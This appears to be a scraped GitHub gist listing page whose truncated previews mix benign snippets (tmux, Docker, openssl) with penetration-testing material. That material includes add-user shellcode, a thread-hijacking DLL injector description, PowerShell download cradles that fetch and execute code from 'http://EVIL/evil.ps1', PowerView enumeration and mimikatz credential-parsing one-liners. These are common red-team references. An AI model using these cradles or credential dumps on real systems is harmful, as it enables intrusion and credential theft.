Dave Hardy davehardy20

## Add User to Windows - Shellcode ASM
global _start
_start:
	jmp short getWinExec
callProc:
	pop ebx
	xor eax,eax
	push eax
	mov [ebx+40],al
	push ebx
	mov eax,0x7c8623ad ;WinExec

## DisplayImage.ps1
# Loosely based on http://www.vistax64.com/powershell/202216-display-image-powershell.html

[void][reflection.assembly]::LoadWithPartialName("System.Windows.Forms")

$file = (get-item 'C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg')
#$file = (get-item "c:\image.jpg")

$img = [System.Drawing.Image]::Fromfile($file);

# This tip from http://stackoverflow.com/questions/3358372/windows-forms-look-different-in-powershell-and-powershell-ise-why/3359274#3359274

## tmux-cheatsheet.markdown

      
              1 file
            
          
              3253 forks
            
          
              181 comments
            
          
              14302 stars
            
          
                MohamedAlaa
                / tmux-cheatsheet.markdown
            
            
              Last active
              April 24, 2024 12:19
            
              
                tmux shortcuts & cheatsheet
              
          
    tmux shortcuts & cheatsheet

start new:
tmux

start new with session name:
tmux new -s myname


## thread-hijacking.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              6 stars
            
          
                CoolOppo
                / thread-hijacking.md
            
            
              Created
              August 27, 2014 00:41
            
          
    This program can injects DLL into running processes using thread hijacking. No remote thread is created, only existing thread is used for injection.
 
The injector injects shellcode into the target process, and then a running thread in the target process is hijacked to execute the injected code. The injected code calls the LoadLibrary function to load the DLL.
 
Usage: ZwInjector [PID] [DLL name]

  
## DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

## PowerView-2.0-tricks.ps1
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
#   has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>

# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse

# get the effective set of users who can administer a server

## certinfo.sh
#!/bin/bash

usage()
{
cat <<EOF
Usage: $(basename $0) [options]

This shell script is a simple wrapper around the openssl binary. It uses
s_client to get certificate information from remote hosts, or x509 for local
certificate files. It can parse out some of the openssl output or just dump all

## One-liner Mimikatz Parser
Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password"

First, before using these parsers, run:  "dos2unix mimikatz_dump.txt"

Mimikatz 1.0:

cat mimikatz_dump.txt  | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u


Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):

## docker_x11_gui_osx.md

      
              1 file
            
          
              3 forks
            
          
              3 comments
            
          
              21 stars
            
          
                stonehippo
                / docker_x11_gui_osx.md
            
            
              Last active
              December 6, 2021 00:21
            
              
                Getting X11 GUI applications to work on OS X with Docker
              
          
    Getting X11 GUI applications to work on OS X with Docker

$ brew install socat
$ brew cask install xquartz <--- assuming you don't already have XQuartz installed some other way
$ open -a XQuartz <--- start an XQuartz session

$ socat TCP-LISTEN:6000,reuseaddr,fork UNIX-CLIENT:\"$DISPLAY\"


## docker-install-rpi3.md

      
              1 file
            
          
              19 forks
            
          
              5 comments
            
          
              80 stars
            
          
                tyrell
                / docker-install-rpi3.md
            
            
              Last active
              December 22, 2023 07:36
            
              
                Installing latest Docker on a Raspberry Pi 3
              
          
    Introduction

I wrote this gist to record the steps I followed to get docker running in my Raspberry Pi 3. The ARM ported debian version (Jessie) comes with an old version of docker. It is so old that the docker hub it tries to interact with doesn't work anymore :)
Hopefully this gist will help someone else to get docker running in their Raspberry Pi 3.
Installation

From original instructions at http://blog.hypriot.com/post/run-docker-rpi3-with-wifi/
	global _start
	_start:
	jmp short getWinExec
	callProc:
	pop ebx
	xor eax,eax
	push eax
	mov [ebx+40],al
	push ebx
	mov eax,0x7c8623ad ;WinExec
	# Loosely based on http://www.vistax64.com/powershell/202216-display-image-powershell.html

	[void][reflection.assembly]::LoadWithPartialName("System.Windows.Forms")

	$file = (get-item 'C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg')
	#$file = (get-item "c:\image.jpg")

	$img = [System.Drawing.Image]::Fromfile($file);

	# This tip from http://stackoverflow.com/questions/3358372/windows-forms-look-different-in-powershell-and-powershell-ise-why/3359274#3359274
	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object
	# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
	# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993

	# get all the groups a user is effectively a member of, 'recursing up'
	Get-NetGroup -UserName <USER>

	# get all the effective members of a group, 'recursing down'
	Get-NetGroupMember -GoupName <GROUP> -Recurse

	# get the effective set of users who can administer a server
	#!/bin/bash

	usage()
	{
	cat <<EOF
	Usage: $(basename $0) [options]

	This shell script is a simple wrapper around the openssl binary. It uses
	s_client to get certificate information from remote hosts, or x509 for local
	certificate files. It can parse out some of the openssl output or just dump all
	Assuming you have a mimikatz dump named "mimikatz_dump.txt", I made these bash one-liners that will reformat the mimikatz output to "domain\user:password"

	First, before using these parsers, run: "dos2unix mimikatz_dump.txt"

	Mimikatz 1.0:

	cat mimikatz_dump.txt \| grep -P '((Utilisateur principal)\|(msv1_0)\|(kerberos)\|(ssp)\|(wdigest)\|(tspkg))\s+:\s+.+' \| grep -v 'n\.' \| sed -e 's/^\s\+[^:]:\s\+//' \| sed -e 's/Utilisateur principal\s\+:\s\+\(.\)$/\n\1/' \| sort -u


	Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):